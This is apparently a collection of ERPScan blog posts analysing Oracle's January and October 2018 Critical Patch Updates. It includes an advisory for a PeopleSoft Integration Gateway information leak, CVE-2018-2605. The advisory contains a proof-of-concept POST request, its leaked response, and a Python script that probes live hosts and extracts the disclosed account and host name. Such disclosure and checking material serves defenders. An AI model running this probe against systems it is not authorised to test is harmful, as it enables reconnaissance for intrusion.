  • The highest CVSS 3.0 base score for vulnerabilities in business applications in this Critical Patch Update is 9.8, found in Fusion Middleware, PeopleSoft and Retail Applications (the overall highest CVSS score, 10.0, is in the Sun ZFS Storage Appliance Kit).
  • The most patched product family is Oracle Financial Services Applications, with 34 fixes. Not only the number but the criticality of the issues is alarming: 13 of them can be exploited over the network without credentials, and the most critical has a CVSS score of 8.8.

Analysis of Oracle Critical Patch Update – January 2018

With this blog post, the ERPScan Research and Security Intelligence teams provide an analysis of the most severe vulnerabilities closed by this Critical Patch Update.

This Critical Patch Update contains slightly fewer security fixes than the previous CPU for October 2017 (see the bar chart below). The downward trend continues this month after the record-breaking 308 issues in the CPU for July 2017.

However, the average number of patches keeps growing over the years: the average number of fixes per CPU was 153 in 2015, 227 in 2016 and 279 in 2017.

Oracle vulnerabilities by application type

The patch update deals with a wide range of products. The affected product families are listed below by the number of closed issues, in descending order.

  Product Family                       Number of Patches
  Financial Services Applications      34
  Fusion Middleware                    27
  MySQL                                25
  Java SE                              21
  Hospitality Applications             21
  PeopleSoft                           15
  Supply Chain Products Suite          14
  Virtualization                       14
  Sun Systems Products Suite           13
  Retail Applications                  11
  Communications Applications          10
  Health Sciences Applications         7
  E-Business Suite                     7
  Database Server                      5
  Hyperion                             4
  Support Tools                        3
  JD Edwards Products                  2
  Siebel CRM                           2
  Construction and Engineering Suite   1
  Java Micro Edition                   1

[Chart: Oracle vulnerabilities by application type]

As the pie chart indicates, Financial Services Applications leads by the number of closed issues.

Vulnerabilities in Oracle's business-critical applications

The fact that Oracle has 110,000 applications customers across a wide range of industries makes it of the utmost importance to apply the released security patches.

This quarter, the Oracle CPU contains 153 patches (64%) for vulnerabilities affecting business applications, namely PeopleSoft, E-Business Suite, Financial Services Applications, Fusion Middleware, Hospitality Applications, Supply Chain Products Suite, Retail Applications, Communications Applications, Health Sciences Applications, Database Server, JD Edwards Products and others. 99 of them (almost 65%) can be exploited remotely without credentials.

Oracle PeopleSoft Security

Oracle PeopleSoft is an application suite of business and industry solutions such as PeopleSoft Human Capital Management, Financial Management, Supplier Relationship Management, Enterprise Services Automation and Supply Chain Management. As it manages a wide range of business processes and stores key data, a successful attack against PeopleSoft allows an attacker to steal or manipulate business-critical information, depending on the modules installed in an organization.

Between this and the previous CPU, Oracle urgently closed severe issues including the vulnerability dubbed JoltandBleed (CVE-2017-10269). As you remember, this vulnerability allows an attacker to gain full access to all data stored in the following ERP systems:

  • Oracle PeopleSoft Campus Solutions
  • Oracle PeopleSoft Human Capital Management
  • Oracle PeopleSoft Financial Management
  • Oracle PeopleSoft Supply Chain Management, etc.

This quarter, the vendor released 15 fixes for the product. 8 of these security loopholes can be exploited over the network without user credentials.

The highest CVSS score is 9.8.

PeopleSoft fixes grew dramatically in July 2017, peaked at 30, and then slid slowly but steadily over the following two quarters.

Oracle E-Business Suite Security

Oracle E-Business Suite (EBS) is the main business software developed by Oracle. As it manages a wide range of business processes and stores key data, a successful attack against Oracle EBS allows an attacker to steal and manipulate business-critical information, depending on the modules installed in an organization.

This Critical Patch Update contains 7 fixes for Oracle EBS. 4 of these security loopholes can be exploited over the network without user credentials. The highest CVSS score is 9.1.

Since January 2017 the number of Oracle EBS fixes fell considerably, reaching a low of 11 in April 2017 and ending the last quarter of the year at 26. The patch update for January 2018 contains 7 Oracle EBS fixes, as in April 2016.

Oracle vulnerabilities identified by ERPScan Research team

This quarter, one vulnerability discovered by ERPScan researchers was closed.

The details are provided below:

  • Information disclosure of the PIA user and PeopleSoft server FQDN (PSIGW/PeopleSoftListeningConnector), CVSS base score 6.5, CVE-2018-2605. Through the disclosure in PSIGW/PeopleSoftListeningConnector, attackers can obtain the PIA user and the fully qualified name of the PeopleSoft server.

The most critical Oracle vulnerabilities closed by CPU January 2018

Oracle prepares risk matrices and associated documentation describing the conditions required to exploit a vulnerability and the potential impact of a successful attack. The severity of the vulnerabilities is calculated with the Common Vulnerability Scoring System (CVSS). This aims to help Oracle customers fix the most critical issues first.

The most critical issues closed by the CPU are the following:

  • Sun ZFS Storage Appliance Kit (AK) has CVE-2018-2611 (CVSS Base Score: 10.0) – Vulnerability in the Sun ZFS Storage Appliance Kit (AK) component of Oracle Sun Systems Products Suite (subcomponent: Core Services). The supported version that is affected is prior to 8.7.13. This easily exploitable vulnerability allows an unauthenticated attacker with network access via HTTP to compromise Sun ZFS Storage Appliance Kit (AK). While the vulnerability is in Sun ZFS Storage Appliance Kit (AK), attacks may significantly impact additional products. Successful attacks can result in takeover of Sun ZFS Storage Appliance Kit (AK).
  • Oracle WebLogic Server has CVE-2017-10352 (CVSS Base Score: 10.0) – Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS – Web Services). The supported version that is affected is 12.2.1.3.0. This easily exploitable vulnerability allows an attacker with network access via HTTP to compromise Oracle WebLogic Server. While the vulnerability is in Oracle WebLogic Server, attacks may significantly impact additional products. Successful attacks can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DoS) of Oracle WebLogic Server as well as unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data and unauthorized read access to a subset of Oracle WebLogic Server accessible data.
  • Oracle Retail Convenience and Fuel POS Software has CVE-2017-5645 (CVSS Base Score: 10.0) – Vulnerability in the Oracle Retail Convenience and Fuel POS Software component of Oracle Retail Applications (subcomponent: OPT Server (Apache Log4j)). The supported version that is affected is 2.1.132. This easily exploitable vulnerability allows an unauthenticated attacker with network access via HTTP to compromise Oracle Retail Convenience and Fuel POS Software. Successful attacks of this vulnerability can result in takeover of Oracle Retail Convenience and Fuel POS Software.
  • Oracle Directory Server Enterprise Edition has CVE-2017-5461 (CVSS Base Score: 9.9) – Vulnerability in the Oracle Directory Server Enterprise Edition component of Oracle Fusion Middleware (subcomponent: Admin Console (Sun Security Libraries)). The supported version that is affected is 11.1.1.7.0. This easily exploitable vulnerability allows an unauthenticated attacker with network access via HTTP to compromise Oracle Directory Server Enterprise Edition. Successful attacks of this vulnerability can result in takeover of Oracle Directory Server Enterprise Edition.
  • PeopleSoft Enterprise FIN Supply Chain Portal Pack Brazil has CVE-2017-5645 (CVSS Base Score: 9.9) – Vulnerability in the PeopleSoft Enterprise FIN Supply Chain Portal Pack Brazil component of Oracle PeopleSoft Products (subcomponent: Supply Chain Portal Pack (Apache Log4j)). The supported version that is affected is 9.1. This easily exploitable vulnerability allows an unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise FIN Supply Chain Portal Pack Brazil. Successful attacks can result in takeover of PeopleSoft Enterprise FIN Supply Chain Portal Pack Brazil.

Securing Oracle applications

It is highly recommended that organizations patch all these vulnerabilities to prevent business risks affecting their systems. Companies providing Oracle security assessment and Oracle penetration testing services should include these vulnerabilities in their checklists. The tests for the latest vulnerabilities in Oracle PeopleSoft are included in ERPScan Security Monitoring Suite for Oracle PeopleSoft.

The post Analyzing Oracle Security – Oracle Critical Patch Update January 2018 appeared first on ERPScan.

    [ERPSCAN-18-001] Information Disclosure in PeopleSoft Listening Connector

    $
    0
    0

    Application: Oracle PeopleSoft
    Versions Affected: Oracle PeopleTools 8.54 – 8.56
    Vendor: Oracle
    Bugs: Information Disclosure
    Reported: 15.06.2017
    Vendor response: 16.06.2017
    Date of Public Advisory: 17.01.2018
    Reference: Oracle CPU January 2018
    Authors: Dmitri Iudin aka @ret5et (ERPScan)

    VULNERABILITY INFORMATION

    Class: Information Disclosure
    Risk: Medium
    Impact: Sensitive data may be exposed to attackers
    Remotely Exploitable: Yes
    Locally Exploitable: Yes
    CVE Name: CVE-2018-2605

    CVSS Information

    CVSS Base Score v3: 6.5 / 10
    CVSS Base Vector:

    AV: Attack Vector (Related exploit range) Network (N)
    AC: Attack Complexity (Required attack complexity) Low (L)
    PR: Privileges Required (Level of privileges needed to exploit) Low (L)
    UI: User Interaction (Required user participation) None (N)
    S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U)
    C: Impact to Confidentiality High (H)
    I: Impact to Integrity None (N)
    A: Impact to Availability None (N)

    VULNERABILITY DESCRIPTION

    A remote unauthenticated attacker can obtain the account under which the PeopleSoft Pure Internet Architecture (PIA) service runs and the PeopleSoft server's host name with a trivial POST request to the Integration Gateway listening connector: both values are embedded in the JavaMail Message-ID header of the gateway's error response (Administrator@psfthcmwin in the capture below).

    VULNERABLE PACKAGES

    Oracle PeopleTools: 8.54
    Oracle PeopleTools: 8.55
    Oracle PeopleTools: 8.56

    SOLUTIONS AND WORKAROUNDS

    To correct this vulnerability, apply Oracle CPU January 2018. Until the patch is applied, a general mitigation is to restrict network access to the Integration Gateway servlets (/PSIGW/) to the hosts that legitimately exchange Integration Broker messages, since the listening connector answers without authentication.

    TECHNICAL DESCRIPTION

    Proof of Concept

    POST http://<PEOPLESOFT_HOST>:8000/PSIGW/PeopleSoftListeningConnector
    Content-Type: application/json
    -- response --
    
    200 OK
    Date: Fri, 16 Jun 2017 11:34:07 GMT
    Content-Length: 675
    Content-Type: text/plain; charset=UTF-8
    Message-ID: 1133584668.1497612847565.JavaMail.Administrator@psfthcmwin    <-- information disclosure: service account "Administrator", host "psfthcmwin"
    Date: Fri, 16 Jun 2017 04:34:07 -0700 (PDT)
    Mime-Version: 1.0
    Content-Type: multipart/related;
    boundary="----=_Part_95_86951755.1497612847564"
    Content-ID: PeopleSoft-Integration-Broker-Internal-Mime-Message
    ------=_Part_95_86951755.1497612847564
    Content-Type: text/plain; charset=UTF-8
    Content-Transfer-Encoding: 8bit
    Content-Disposition: inline
    Content-ID: IBInfo
    <?xml version="1.0"?>2015810408Integration Gateway Error
    ------=_Part_95_86951755.1497612847564--
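    The following parser is an added example (not ERPScan's or Oracle's code) that turns the capture above into a repeatable check: it splits a raw HTTP response, parses the MIME body with the standard library, and reports the user, host and gateway clock leaked through the JavaMail Message-ID. The sample response is constructed from the advisory's capture (the blank line after the MIME headers and the header folding are restored; the XML element tags of the IBInfo part did not survive extraction and are left as captured). The probe() function takes an injectable fetcher, so the parser runs offline; the http_post() fetcher, base URL and function names are this example's own assumptions.

```python
"""Offline check for the PeopleSoft Listening Connector information leak
(CVE-2018-2605). Added example, not ERPScan's or Oracle's code."""
import email
import re
import urllib.error
import urllib.request
from datetime import datetime, timezone
from typing import Callable, Dict, Optional, Tuple

PROBE_PATH = "/PSIGW/PeopleSoftListeningConnector"

# JavaMail builds Message-ID as <random>.<epoch-millis>.JavaMail.<user>@<host>
_MSGID_RE = re.compile(
    r"^<?(?P<seq>\d+)\.(?P<millis>\d+)\.JavaMail\.(?P<user>[^@\s<>]+)@(?P<host>[^\s<>]+)>?$"
)


def split_http_response(raw: str) -> Tuple[Optional[int], Dict[str, str], str]:
    """Split a raw HTTP response into (status code, headers, body).
    Accepts 'HTTP/1.1 200 OK' as well as the bare '200 OK' of the capture."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    status = next((int(t) for t in lines[0].split() if len(t) == 3 and t.isdigit()), None)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def extract_leak(raw_response: str) -> Optional[dict]:
    """Return the disclosed user, host and gateway clock, or None when the
    body carries no JavaMail-style Message-ID."""
    status, _headers, body = split_http_response(raw_response)
    if status != 200:
        return None
    msg = email.message_from_string(body)        # the body is a MIME message
    match = _MSGID_RE.match((msg.get("Message-ID") or "").strip())
    if not match:
        return None
    # A part with Content-ID IBInfo is the Integration Broker error envelope
    ib_error = any(p.get("Content-ID") == "IBInfo" for p in msg.walk())
    sent_at = datetime.fromtimestamp(int(match["millis"]) / 1000, tz=timezone.utc)
    return {
        "user": match["user"],
        "host": match["host"],
        "gateway_time": sent_at.isoformat(),     # should agree with the Date header
        "ib_error_envelope": ib_error,
    }


def http_post(url: str) -> str:
    """Default fetcher (assumed): POST an empty JSON body, return the raw response."""
    req = urllib.request.Request(url, data=b"{}", method="POST",
                                 headers={"Content-Type": "application/json"})
    try:
        resp = urllib.request.urlopen(req, timeout=10)
    except urllib.error.HTTPError as err:
        resp = err                               # non-2xx answers still carry headers/body
    status = getattr(resp, "status", None) or resp.code
    head = f"HTTP/1.1 {status} {resp.reason}\n"
    head += "".join(f"{k}: {v}\n" for k, v in resp.headers.items())
    return head + "\n" + resp.read().decode("utf-8", "replace")


def probe(base_url: str, fetch: Callable[[str], str] = http_post) -> Optional[dict]:
    """Probe one gateway; base_url like 'http://<PEOPLESOFT_HOST>:8000'."""
    return extract_leak(fetch(base_url.rstrip("/") + PROBE_PATH))


# Constructed from the advisory's capture; not a live response.
SAMPLE_RESPONSE = """200 OK
Date: Fri, 16 Jun 2017 11:34:07 GMT
Content-Length: 675
Content-Type: text/plain; charset=UTF-8

Message-ID: 1133584668.1497612847565.JavaMail.Administrator@psfthcmwin
Date: Fri, 16 Jun 2017 04:34:07 -0700 (PDT)
Mime-Version: 1.0
Content-Type: multipart/related;
 boundary="----=_Part_95_86951755.1497612847564"
Content-ID: PeopleSoft-Integration-Broker-Internal-Mime-Message

------=_Part_95_86951755.1497612847564
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Content-Disposition: inline
Content-ID: IBInfo

<?xml version="1.0"?>2015810408Integration Gateway Error
------=_Part_95_86951755.1497612847564--
"""

if __name__ == "__main__":
    # Offline run: feed the constructed sample through the probe.
    print(probe("http://<PEOPLESOFT_HOST>:8000", fetch=lambda _url: SAMPLE_RESPONSE))
```

    Against a live system, probe("http://host:8000") sends the same unauthenticated POST as the advisory; a None result after the January 2018 CPU is the expected outcome. The epoch-milliseconds field of the Message-ID also gives the gateway's clock (here 2017-06-16 11:34:07 UTC, matching the Date header), which is why the check reports it alongside the user and host.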

    The post [ERPSCAN-18-001] Information Disclosure in PeopleSoft Listening Connector appeared first on ERPScan.

    Analyzing Oracle Security – Oracle Critical Patch Update for October 2018


    Today Oracle has released its quarterly patch update for October 2018. It fixes 301 vulnerabilities.

    The main highlights are as follows:

    • Oracle closed 1119 issues in 2018 in total, the same number as in 2017.
    • CPU for October 2018 contains 162 vulnerabilities in business-critical applications.
    • The most vulnerable application is Oracle Fusion Middleware totaling 65 security issues. Their criticality is also alarming since 86% of them can be exploited over the network without entering user credentials.
    • This CPU contains 49 vulnerabilities assessed at critical (CVSS base score 9.0-10.0). The most severe vulnerability of the current CPU with the highest CVSS score of 10.0 is in the Oracle GoldenGate component.

    Analysis of Oracle Critical Patch Update for October 2018

    ERPScan Research and Security Intelligence teams provide an analysis of the vulnerabilities closed by this Critical Patch Update.

    Compared with the previous CPU for July 2018, which passed the 330-issue mark and became the largest ever, this month's patch update addresses about 10% fewer vulnerabilities (see the bar chart below).

    Oracle fixed 1119 security issues in total in 2018. It is worth mentioning that this number remains the same as in 2017. The graph below illustrates the trend and the increasing number of patches released by Oracle for each year from 2013 to 2018.

    Oracle vulnerabilities by application type

    The patch updates touch a wide range of products. The affected product families are shown in the table below, sorted in descending order of closed issues (the counts add up to the 301 fixes of this CPU).

    Product Family                        Number of Patches
    Fusion Middleware                     65
    MySQL                                 38
    Retail Applications                   31
    PeopleSoft                            24
    Sun Systems Products Suite            19
    E-Business Suite                      16
    Communications Applications           14
    Virtualization                        14
    Java SE                               12
    Construction and Engineering Suite    10
    Hospitality Applications               9
    Hyperion                               9
    Database Server                        7
    JD Edwards Products                    6
    Supply Chain Products Suite            6
    Insurance Applications                 5
    Enterprise Manager Products Suite      4
    Food and Beverage Applications         4
    Siebel CRM                             3
    Financial Services Applications        2
    iLearning                              1
    Health Sciences Applications           1
    Support Tools                          1

    As seen from the table and illustrated in a pie chart, Fusion Middleware leads by the number of the closed issues.

    Vulnerabilities in Oracle’s business-critical applications

    The fact that Oracle has 430,000 applications customers from a wide range of industries in 175 countries makes it of the utmost importance to apply the released security patches.

    This quarter's CPU contains 162 patches for vulnerabilities affecting the most crucial business applications from Oracle, namely PeopleSoft, E-Business Suite, Fusion Middleware, Retail, JD Edwards, Siebel CRM, Financial Services, Hospitality Applications and Supply Chain. That is 54% of the vulnerabilities found in Oracle products this quarter.

    125 of these security vulnerabilities can be exploited remotely without entering credentials.

    Oracle PeopleSoft Security

    Oracle PeopleSoft is an application suite of business and industry solutions such as PeopleSoft Human Capital Management, Financial Management, Supplier Relationship Management, Enterprise Services Automation, and Supply Chain Management. As it manages a wide range of business processes and stores key data, a successful attack against PeopleSoft allows an attacker to steal or manipulate business information, depending on modules installed in an organization.

    This quarter, the vendor released 24 fixes (8% of the update) for PeopleSoft (see the bar chart). 21 of them can be exploited over a network without requiring user credentials.

    As seen from the graph, the number of vulnerabilities in PeopleSoft has fluctuated several times since October 2015 and rose from April to October 2018.

    Oracle E-Business Suite Security

    Oracle E-Business Suite (EBS) is the main business software developed by Oracle. As it manages a wide range of business processes and stores key data, a successful attack against Oracle EBS allows an attacker to steal and manipulate different business critical information, depending on modules installed in an organization.

    This critical patch update contains 16 fixes for Oracle EBS, and 14 of the vulnerabilities may be remotely exploitable without authentication. The highest CVSS score is 8.2.

    The most critical Oracle vulnerabilities closed by CPU for October 2018

    Oracle prepares Risk Matrices and associated documentation describing the conditions that are required to exploit a vulnerability and the potential impact of a successful attack. The severity of the vulnerabilities is calculated via the Common Vulnerability Scoring System (CVSS). This aims to help Oracle customers fix the most critical issues first.

    The most critical issues closed by the CPU are as follows:

    • Oracle GoldenGate has CVE-2018-2913 (CVSS Base Score: 10.0) – a vulnerability in the Oracle GoldenGate component of Oracle GoldenGate (subcomponent: Monitoring Manager). Supported versions that are affected are 12.1.2.1.0, 12.2.0.2.0 and 12.3.0.1.0. The easily exploitable vulnerability allows an unauthenticated attacker with network access via TCP to compromise Oracle GoldenGate. While the vulnerability exists in Oracle GoldenGate, attacks may significantly impact additional products. Successful attacks can result in the takeover of Oracle GoldenGate.
    • Java VM has CVE-2018-3259 (CVSS Base Score: 9.8) – a vulnerability in the Java VM component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1 and 18c. The easily exploitable vulnerability allows an unauthenticated attacker with network access via multiple protocols to compromise Java VM. Successful attacks caused by this vulnerability can result in the takeover of Java VM.
    • Oracle Big Data Discovery has CVE-2018-1275 (CVSS Base Score: 9.8) – a vulnerability in the Oracle Big Data Discovery component of Oracle Fusion Middleware (subcomponent: Data Processing (Spring Framework)). The supported version that is affected is 1.6.0. The easily exploitable vulnerability allows an unauthenticated attacker with network access via HTTP to compromise Oracle Big Data Discovery. Successful attacks of this vulnerability can result in takeover of Oracle Big Data Discovery.
    • JD Edwards EnterpriseOne Orchestrator has CVE-2018-7489 (CVSS Base Score: 9.8) – a vulnerability in the JD Edwards EnterpriseOne Orchestrator component of Oracle JD Edwards Products (subcomponent: IoT Orchestrator Security (jackson-databind)). The supported version that is affected is 9.2. The easily exploitable vulnerability allows an unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Orchestrator. Successful attacks of this vulnerability can result in the takeover of JD Edwards EnterpriseOne Orchestrator.
    • MySQL Enterprise Monitor has CVE-2018-11776 (CVSS Base Score: 9.8) – Vulnerability in the MySQL Enterprise Monitor component of Oracle MySQL (subcomponent: Monitoring: General (Apache Struts 2)). Supported versions that are affected are 3.4.9.4237 and prior, 4.0.6.5281 and prior and 8.0.2.8191 and prior. The easily exploitable vulnerability allows an unauthenticated attacker with network access via HTTP to compromise MySQL Enterprise Monitor. Successful attacks of this vulnerability can result in the takeover of MySQL Enterprise Monitor.

    Securing Oracle applications

    It is highly recommended that organizations patch all those vulnerabilities to prevent business risks affecting their systems. Companies providing Oracle Security assessment and Oracle Penetration testing services should include these vulnerabilities in their checklists. The tests for the latest vulnerabilities in Oracle PeopleSoft are included in ERPScan Security Monitoring Suite for Oracle PeopleSoft.

    The post Analyzing Oracle Security – Oracle Critical Patch Update for October 2018 appeared first on ERPScan.
